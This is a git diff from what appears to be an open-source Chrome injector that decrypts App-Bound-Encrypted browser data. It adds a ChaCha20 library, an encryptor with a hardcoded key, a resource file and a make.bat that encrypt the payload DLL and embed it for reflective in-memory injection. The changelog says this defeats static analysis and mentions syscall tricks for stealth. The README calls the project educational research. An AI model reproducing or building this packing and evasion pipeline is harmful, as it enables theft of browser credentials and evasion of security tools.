[#] HandleGuard: closing handle 0xdc (TargetProcessHandle)
|
||||
[#] HandleGuard: closing handle 0xd4 (NamedPipeServer)
|
||||
[#] Freed remote pipe name memory.
|
||||
```
|
||||
|
||||
## 📂 Data Extraction
|
||||
@@ -353,6 +345,11 @@ Each payment file is a JSON array of objects:
|
||||
|
||||
## 🆕 Changelog
|
||||
|
||||
### v0.12
|
||||
- **Fileless Payload Execution (Encrypted Resource Delivery)**: Migrated the payload DLL from a disk-based file to an in-memory, **ChaCha20-encrypted** resource embedded within the injector. The payload is now decrypted at runtime and reflectively injected, eliminating on-disk artifacts and defeating static analysis.
|
||||
- **Code Modernization (Full C++ Refactoring)**: Re-architected the entire codebase with modern C++ principles.
|
||||
- **Professional Build System**: Implemented a robust make.bat script for clean, reliable, and configurable local builds.
|
||||
|
||||
### v0.11
|
||||
- **Kernel-Level Execution Syscall Engine (Halo's & Tartarus Gate Fusion)**: Implemented a multi-architecture syscall resolution system for improved stealth. This hybrid engine combines the strengths of multiple modern techniques:
|
||||
- The injector first attempts a [Halo's Gate](https://blog.sektor7.net/#!res/2021/halosgate.md) approach by dynamically calculating the required System Service Numbers (SSNs) and hunting for clean, unhooked syscall stubs within ntdll.dll.
|
||||
@@ -411,7 +408,9 @@ Further Links:
|
||||
|
||||
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
|
||||
|
||||
## Disclaimer
|
||||
## 💡 Project Philosophy & Disclaimer
|
||||
|
||||
> [!WARNING]
|
||||
> This tool is intended for cybersecurity research and educational purposes. Ensure compliance with all relevant legal and ethical guidelines when using this tool.
|
||||
> [!IMPORTANT]
|
||||
> This is a hobby project created for educational and security research purposes. It serves as a personal learning experience and a playing field for exploring advanced Windows concepts.
|
||||
>
|
||||
> **This tool is NOT intended to be a fully-featured infostealer or a guaranteed EDR evasion tool.** While it employs advanced techniques, its primary goal is to demonstrate and dissect the ABE mechanism, not to provide operational stealth for malicious use. Please ensure compliance with all relevant legal and ethical guidelines.
|
||||
@@ -0,0 +1,108 @@
|
||||
// libs/chacha/chacha.h
|
||||
// A public domain, self-contained ChaCha20 implementation.
|
||||
|
||||
#ifndef CHACHA20_H
|
||||
#define CHACHA20_H
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stddef.h>
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
// Main ChaCha20 function. Encrypts/decrypts data in place.
|
||||
void chacha20_block(const uint8_t key[32], const uint8_t nonce[12], uint32_t counter, uint8_t* out);
|
||||
void chacha20_xor(const uint8_t key[32], const uint8_t nonce[12], uint8_t* data, size_t data_len, uint32_t counter);
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
#endif // CHACHA20_H
|
||||
|
||||
#ifdef CHACHA20_IMPLEMENTATION
|
||||
|
||||
// Internal utility functions
|
||||
static uint32_t chacha20_load32(const uint8_t *x) {
|
||||
return (uint32_t)(x[0]) | ((uint32_t)(x[1]) << 8) | ((uint32_t)(x[2]) << 16) | ((uint32_t)(x[3]) << 24);
|
||||
}
|
||||
|
||||
static void chacha20_store32(uint8_t *x, uint32_t u) {
|
||||
x[0] = u & 0xff; u >>= 8;
|
||||
x[1] = u & 0xff; u >>= 8;
|
||||
x[2] = u & 0xff; u >>= 8;
|
||||
x[3] = u & 0xff;
|
||||
}
|
||||
|
||||
static uint32_t chacha20_rotl(uint32_t x, int n) {
|
||||
return (x << n) | (x >> (32 - n));
|
||||
}
|
||||
|
||||
// The ChaCha20 quarter round function
|
||||
#define CHACHA20_QR(a, b, c, d) \
|
||||
a += b; d ^= a; d = chacha20_rotl(d, 16); \
|
||||
c += d; b ^= c; b = chacha20_rotl(b, 12); \
|
||||
a += b; d ^= a; d = chacha20_rotl(d, 8); \
|
||||
c += d; b ^= c; b = chacha20_rotl(b, 7);
|
||||
|
||||
void chacha20_block(const uint8_t key[32], const uint8_t nonce[12], uint32_t counter, uint8_t* out) {
|
||||
uint32_t x[16];
|
||||
uint32_t j[16];
|
||||
int i;
|
||||
|
||||
// Constants
|
||||
x[0] = 0x61707865;
|
||||
x[1] = 0x3320646e;
|
||||
x[2] = 0x79622d32;
|
||||
x[3] = 0x6b206574;
|
||||
|
||||
// Key
|
||||
x[4] = chacha20_load32(key + 0);
|
||||
x[5] = chacha20_load32(key + 4);
|
||||
x[6] = chacha20_load32(key + 8);
|
||||
x[7] = chacha20_load32(key + 12);
|
||||
x[8] = chacha20_load32(key + 16);
|
||||
x[9] = chacha20_load32(key + 20);
|
||||
x[10] = chacha20_load32(key + 24);
|
||||
x[11] = chacha20_load32(key + 28);
|
||||
|
||||
// Counter and Nonce
|
||||
x[12] = counter;
|
||||
x[13] = chacha20_load32(nonce + 0);
|
||||
x[14] = chacha20_load32(nonce + 4);
|
||||
x[15] = chacha20_load32(nonce + 8);
|
||||
|
||||
for (i = 0; i < 16; ++i) j[i] = x[i];
|
||||
|
||||
for (i = 0; i < 10; ++i) { // 20 rounds = 10 double rounds
|
||||
CHACHA20_QR(j[0], j[4], j[8], j[12]);
|
||||
CHACHA20_QR(j[1], j[5], j[9], j[13]);
|
||||
CHACHA20_QR(j[2], j[6], j[10], j[14]);
|
||||
CHACHA20_QR(j[3], j[7], j[11], j[15]);
|
||||
CHACHA20_QR(j[0], j[5], j[10], j[15]);
|
||||
CHACHA20_QR(j[1], j[6], j[11], j[12]);
|
||||
CHACHA20_QR(j[2], j[7], j[8], j[13]);
|
||||
CHACHA20_QR(j[3], j[4], j[9], j[14]);
|
||||
}
|
||||
|
||||
for (i = 0; i < 16; ++i) x[i] += j[i];
|
||||
for (i = 0; i < 16; ++i) chacha20_store32(out + 4 * i, x[i]);
|
||||
}
|
||||
|
||||
void chacha20_xor(const uint8_t key[32], const uint8_t nonce[12], uint8_t* data, size_t data_len, uint32_t counter) {
|
||||
uint8_t block[64];
|
||||
size_t i;
|
||||
|
||||
for (; data_len >= 64; data_len -= 64, data += 64) {
|
||||
chacha20_block(key, nonce, counter++, block);
|
||||
for (i = 0; i < 64; ++i) data[i] ^= block[i];
|
||||
}
|
||||
|
||||
if (data_len > 0) {
|
||||
chacha20_block(key, nonce, counter, block);
|
||||
for (i = 0; i < data_len; ++i) data[i] ^= block[i];
|
||||
}
|
||||
}
|
||||
|
||||
#endif
|
||||
@@ -0,0 +1,230 @@
|
||||
@echo off
|
||||
setlocal enabledelayedexpansion
|
||||
|
||||
:: =============================================================================
|
||||
:: = CONFIGURATION =
|
||||
:: =============================================================================
|
||||
set "BUILD_DIR=build"
|
||||
set "FINAL_EXE_NAME=chrome_inject.exe"
|
||||
set "PAYLOAD_DLL_NAME=chrome_decrypt.dll"
|
||||
set "ENCRYPTOR_EXE_NAME=encryptor.exe"
|
||||
set "VERBOSE=0"
|
||||
|
||||
:: Compiler and Linker Flags
|
||||
set "CFLAGS_COMMON=/nologo /W3 /O2 /MT /GS-"
|
||||
set "CFLAGS_CPP_ONLY=/EHsc /std:c++17"
|
||||
set "LFLAGS_COMMON=/link /NOLOGO /DYNAMICBASE /NXCOMPAT"
|
||||
|
||||
:: =============================================================================
|
||||
:: = COLORS =
|
||||
:: =============================================================================
|
||||
for /f %%a in ('echo prompt $E ^| cmd') do set "ESC=%%a"
|
||||
set "C_RESET=%ESC%[0m"
|
||||
set "C_RED=%ESC%[91m"
|
||||
set "C_GREEN=%ESC%[92m"
|
||||
set "C_YELLOW=%ESC%[93m"
|
||||
set "C_CYAN=%ESC%[96m"
|
||||
set "C_GRAY=%ESC%[90m"
|
||||
|
||||
:: =============================================================================
|
||||
:: = ENTRY POINT =
|
||||
:: =============================================================================
|
||||
|
||||
call :main
|
||||
set "EXIT_CODE=%errorlevel%"
|
||||
|
||||
if %EXIT_CODE% equ 0 (
|
||||
call :log_info "Build successful. Final artifacts are ready."
|
||||
) else (
|
||||
call :log_error "Build failed. Cleaning up intermediate files."
|
||||
call :cleanup >nul 2>&1
|
||||
)
|
||||
|
||||
endlocal
|
||||
exit /b %EXIT_CODE%
|
||||
|
||||
|
||||
:: =============================================================================
|
||||
:: = MAIN LOGIC =
|
||||
:: =============================================================================
|
||||
:main
|
||||
call :display_banner
|
||||
call :check_environment
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
call :pre_build_setup
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
call :compile_sqlite
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
call :compile_payload
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
call :compile_encryptor
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
call :encrypt_payload
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
call :compile_resource
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
call :compile_injector
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
call :post_build_summary
|
||||
exit /b 0
|
||||
|
||||
:: =============================================================================
|
||||
:: = BUILD SUBROUTINES =
|
||||
:: =============================================================================
|
||||
|
||||
:display_banner
|
||||
echo %C_CYAN%--------------------------------------------------%C_RESET%
|
||||
echo %C_CYAN%^| Chrome Injector Build Script ^|%C_RESET%
|
||||
echo %C_CYAN%--------------------------------------------------%C_RESET%
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:check_environment
|
||||
call :log_info "Verifying build environment..."
|
||||
if not defined DevEnvDir (
|
||||
call :log_error "This script must be run from a Developer Command Prompt for VS."
|
||||
exit /b 1
|
||||
)
|
||||
call :log_success "Developer environment detected."
|
||||
call :log_info "Target Architecture: %C_YELLOW%%VSCMD_ARG_TGT_ARCH%%C_RESET%"
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:pre_build_setup
|
||||
call :log_info "Performing pre-build setup..."
|
||||
REM Clean up artifacts from any previous build
|
||||
call :cleanup
|
||||
call :log_info " - Creating fresh build directory: %BUILD_DIR%"
|
||||
mkdir "%BUILD_DIR%"
|
||||
if %errorlevel% neq 0 (
|
||||
call :log_error "Failed to create build directory."
|
||||
exit /b 1
|
||||
)
|
||||
call :log_success "Setup complete."
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:compile_sqlite
|
||||
call :log_step "[1/6] Compiling SQLite3 Library"
|
||||
set "CMD_COMPILE=cl %CFLAGS_COMMON% /c libs\sqlite\sqlite3.c /Fo"%BUILD_DIR%\sqlite3.obj""
|
||||
set "CMD_LINK=lib /NOLOGO /OUT:"%BUILD_DIR%\sqlite3.lib" "%BUILD_DIR%\sqlite3.obj""
|
||||
call :run_command "%CMD_COMPILE%" " - Compiling C object file..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
call :run_command "%CMD_LINK%" " - Creating static library..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
call :log_success "SQLite3 library built successfully."
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:compile_payload
|
||||
call :log_step "[2/6] Compiling Payload DLL (%PAYLOAD_DLL_NAME%)"
|
||||
set "CMD_C=cl %CFLAGS_COMMON% /c src\reflective_loader.c /Fo"%BUILD_DIR%\reflective_loader.obj""
|
||||
call :run_command "%CMD_C%" " - Compiling C file (reflective_loader.c)..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
set "CMD_CPP=cl %CFLAGS_COMMON% %CFLAGS_CPP_ONLY% /Ilibs\sqlite /c src\chrome_decrypt.cpp /Fo"%BUILD_DIR%\chrome_decrypt.obj""
|
||||
call :run_command "%CMD_CPP%" " - Compiling C++ file (chrome_decrypt.cpp)..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
|
||||
set "CMD_LINK=link /NOLOGO /DLL /OUT:"%BUILD_DIR%\%PAYLOAD_DLL_NAME%" "%BUILD_DIR%\chrome_decrypt.obj" "%BUILD_DIR%\reflective_loader.obj" "%BUILD_DIR%\sqlite3.lib" bcrypt.lib ole32.lib oleaut32.lib shell32.lib version.lib comsuppw.lib /IMPLIB:"%BUILD_DIR%\chrome_decrypt.lib""
|
||||
call :run_command "%CMD_LINK%" " - Linking objects into DLL..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
call :log_success "Payload DLL compiled successfully."
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:compile_encryptor
|
||||
call :log_step "[3/6] Compiling Encryption Utility (%ENCRYPTOR_EXE_NAME%)"
|
||||
set "CMD=cl %CFLAGS_COMMON% %CFLAGS_CPP_ONLY% /Ilibs\chacha src\encryptor.cpp /Fo"%BUILD_DIR%\encryptor.obj" %LFLAGS_COMMON% /OUT:"%BUILD_DIR%\%ENCRYPTOR_EXE_NAME%""
|
||||
call :run_command "%CMD%" " - Compiling and linking..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
call :log_success "Encryptor utility compiled successfully."
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:encrypt_payload
|
||||
call :log_step "[4/6] Encrypting Payload DLL"
|
||||
set "CMD="%BUILD_DIR%\%ENCRYPTOR_EXE_NAME%" "%BUILD_DIR%\%PAYLOAD_DLL_NAME%" "%BUILD_DIR%\chrome_decrypt.enc""
|
||||
call :run_command "%CMD%" " - Running encryption process..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
call :log_success "Payload encrypted to chrome_decrypt.enc."
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:compile_resource
|
||||
call :log_step "[5/6] Compiling Resource File"
|
||||
set "CMD=rc.exe /i "%BUILD_DIR%" /fo "%BUILD_DIR%\resource.res" src\resource.rc"
|
||||
call :run_command "%CMD%" " - Compiling .rc to .res..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
call :log_success "Resource file compiled successfully."
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:compile_injector
|
||||
call :log_step "[6/6] Compiling Final Injector (%FINAL_EXE_NAME%)"
|
||||
set "CMD=cl %CFLAGS_COMMON% %CFLAGS_CPP_ONLY% /Ilibs\chacha src\chrome_inject.cpp src\syscalls.cpp /Fo"%BUILD_DIR%\\" "%BUILD_DIR%\resource.res" version.lib shell32.lib %LFLAGS_COMMON% /OUT:".\%FINAL_EXE_NAME%""
|
||||
call :run_command "%CMD%" " - Compiling and linking..."
|
||||
if %errorlevel% neq 0 exit /b 1
|
||||
call :log_success "Final injector built successfully."
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
:post_build_summary
|
||||
echo %C_CYAN%--------------------------------------------------%C_RESET%
|
||||
echo %C_CYAN%^| BUILD SUCCESSFUL ^|%C_RESET%
|
||||
echo %C_CYAN%--------------------------------------------------%C_RESET%
|
||||
echo.
|
||||
echo %C_YELLOW%Final Executable:%C_RESET% .\%FINAL_EXE_NAME%
|
||||
echo.
|
||||
goto :eof
|
||||
|
||||
|
||||
:: =============================================================================
|
||||
:: = HELPER SUBROUTINES =
|
||||
:: =============================================================================
|
||||
|
||||
:run_command
|
||||
set "command_to_run=%~1"
|
||||
set "message=%~2"
|
||||
call :log_info "%message%"
|
||||
if %VERBOSE%==1 (
|
||||
echo %C_GRAY%!command_to_run!%C_RESET%
|
||||
!command_to_run!
|
||||
) else (
|
||||
!command_to_run! >nul 2>nul
|
||||
)
|
||||
|
||||
if %errorlevel% neq 0 (
|
||||
call :log_error "Previous step failed. Halting build."
|
||||
exit /b 1
|
||||
)
|
||||
goto :eof
|
||||
|
||||
:cleanup
|
||||
if exist "%BUILD_DIR%\" rmdir /s /q "%BUILD_DIR%"
|
||||
if exist "%FINAL_EXE_NAME%" del "%FINAL_EXE_NAME%" > nul 2>&1
|
||||
goto :eof
|
||||
|
||||
:log_step
|
||||
echo %C_YELLOW%-- %~1 %C_YELLOW%------------------------------------------------%C_RESET%
|
||||
goto :eof
|
||||
|
||||
:log_info
|
||||
echo %C_GRAY%[INFO]%C_RESET% %~1
|
||||
goto :eof
|
||||
|
||||
:log_success
|
||||
echo %C_GREEN%[ OK ]%C_RESET% %~1
|
||||
goto :eof
|
||||
|
||||
:log_error
|
||||
echo %C_RED%[FAIL]%C_RESET% %~1
|
||||
goto :eof
|
||||
+526
-1202
File diff suppressed because it is too large
Load Diff
+760
-1025
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,57 @@
|
||||
// encryptor.cpp
|
||||
// v0.12.0 (c) Alexander 'xaitax' Hagenah
|
||||
// Licensed under the MIT License. See LICENSE file in the project root for full license information.
|
||||
|
||||
// Define the implementation flag BEFORE including the header
|
||||
#define CHACHA20_IMPLEMENTATION
|
||||
#include "..\libs\chacha\chacha20.h"
|
||||
|
||||
#include <iostream>
|
||||
#include <fstream>
|
||||
#include <vector>
|
||||
#include <cstdint>
|
||||
|
||||
// A 256-bit (32-byte) key.
|
||||
static const uint8_t aKey[32] = {
|
||||
0x1B, 0x27, 0x55, 0x64, 0x73, 0x8B, 0x9F, 0x4D,
|
||||
0x58, 0x4A, 0x7D, 0x67, 0x8C, 0x79, 0x77, 0x46,
|
||||
0xBE, 0x6B, 0x4E, 0x0C, 0x54, 0x57, 0xCD, 0x95,
|
||||
0x18, 0xDE, 0x7E, 0x21, 0x47, 0x66, 0x7C, 0x94
|
||||
};
|
||||
|
||||
// A 96-bit (12-byte) nonce.
|
||||
static const uint8_t aNonce[12] = {
|
||||
0x4A, 0x51, 0x78, 0x62, 0x8D, 0x2D, 0x4A, 0x54,
|
||||
0x88, 0xE5, 0x3C, 0x50
|
||||
};
|
||||
|
||||
int main(int argc, char* argv[]) {
|
||||
if (argc != 3) {
|
||||
std::cerr << "Usage: " << argv[0] << " <input_file> <output_file>" << std::endl;
|
||||
return 1;
|
||||
}
|
||||
|
||||
std::ifstream inFile(argv[1], std::ios::binary);
|
||||
if (!inFile) {
|
||||
std::cerr << "Error opening input file: " << argv[1] << std::endl;
|
||||
return 1;
|
||||
}
|
||||
|
||||
std::vector<uint8_t> buffer((std::istreambuf_iterator<char>(inFile)), std::istreambuf_iterator<char>());
|
||||
inFile.close();
|
||||
|
||||
// Encrypt the buffer in-place using our new function
|
||||
chacha20_xor(aKey, aNonce, buffer.data(), buffer.size(), 0);
|
||||
|
||||
std::ofstream outFile(argv[2], std::ios::binary);
|
||||
if (!outFile) {
|
||||
std::cerr << "Error opening output file: " << argv[2] << std::endl;
|
||||
return 1;
|
||||
}
|
||||
|
||||
outFile.write(reinterpret_cast<const char*>(buffer.data()), buffer.size());
|
||||
outFile.close();
|
||||
|
||||
std::cout << "Successfully ChaCha20-encrypted " << argv[1] << " to " << argv[2] << std::endl;
|
||||
return 0;
|
||||
}
|
||||
@@ -1,5 +1,5 @@
|
||||
// reflective_loader.c
|
||||
// v0.11.0 (c) Alexander 'xaitax' Hagenah
|
||||
// v0.12.0 (c) Alexander 'xaitax' Hagenah
|
||||
// Licensed under the MIT License. See LICENSE file in the project root for full license information.
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
// reflective_loader.h
|
||||
// v0.11.0 (c) Alexander 'xaitax' Hagenah
|
||||
// v0.12.0 (c) Alexander 'xaitax' Hagenah
|
||||
// Licensed under the MIT License. See LICENSE file in the project root for full license information.
|
||||
|
||||
#ifndef REFLECTIVE_LOADER_H
|
||||
|
||||
@@ -0,0 +1,4 @@
|
||||
// resource.rc
|
||||
// v0.12.0 (c) Alexander 'xaitax' Hagenah
|
||||
// Licensed under the MIT License. See LICENSE file in the project root for full license information.
|
||||
PAYLOAD_DLL RCDATA "chrome_decrypt.enc"
|
||||
+1
-1
@@ -1,5 +1,5 @@
|
||||
// syscalls.cpp
|
||||
// v0.11.0 (c) Alexander 'xaitax' Hagenah
|
||||
// v0.12.0 (c) Alexander 'xaitax' Hagenah
|
||||
// Licensed under the MIT License. See LICENSE file in the project root for full license information.
|
||||
|
||||
#include "syscalls.h"
|
||||
|
||||
+1
-1
@@ -1,5 +1,5 @@
|
||||
// syscalls.h
|
||||
// v0.11.0 (c) Alexander 'xaitax' Hagenah
|
||||
// v0.12.0 (c) Alexander 'xaitax' Hagenah
|
||||
// Licensed under the MIT License. See LICENSE file in the project root for full license information.
|
||||
|
||||
#ifndef SYSCALLS_H
|
||||
|
||||
Reference in New Issue
Block a user